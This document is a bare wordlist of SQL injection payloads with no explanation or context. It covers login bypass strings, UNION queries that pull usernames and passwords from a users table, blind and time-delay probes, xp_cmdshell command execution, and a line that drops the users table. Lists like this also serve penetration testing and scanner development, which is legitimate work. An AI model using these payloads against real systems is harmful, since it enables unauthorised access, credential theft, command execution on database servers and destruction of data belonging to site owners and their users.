# SQL Injection Payloads
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
" OR "1"="1
" OR "1"="1"--
admin'--
admin'#
1' OR '1'='1
1' OR '1'='1'--
1' AND '1'='1
1' AND '1'='2
1' AND 1=1--
1' AND 1=2--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
' UNION ALL SELECT NULL,NULL,NULL--
1' ORDER BY 1--
1' ORDER BY 5--
1' GROUP BY columnnames having 1=1--
' HAVING 1=1--
' GROUP BY 1 having 1=1--
' AND SUBSTRING((SELECT database()),1,1)='a'--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--
' AND LENGTH((SELECT database()))>5--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
1'; WAITFOR DELAY '0:0:5'--
1' AND SLEEP(5)--
1' AND BENCHMARK(10000000,SHA1('test'))--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
'; exec xp_cmdshell('dir')--
'; exec master..xp_cmdshell 'dir'--
' OR 1=1 LIMIT 1--
'; DROP TABLE users--
' UNION SELECT username,password FROM users--
1' UNION SELECT CONCAT(username,':',password) FROM users--
' AND (SELECT COUNT(*) FROM users)>0--
' UNION SELECT table_schema FROM information_schema.schemata--
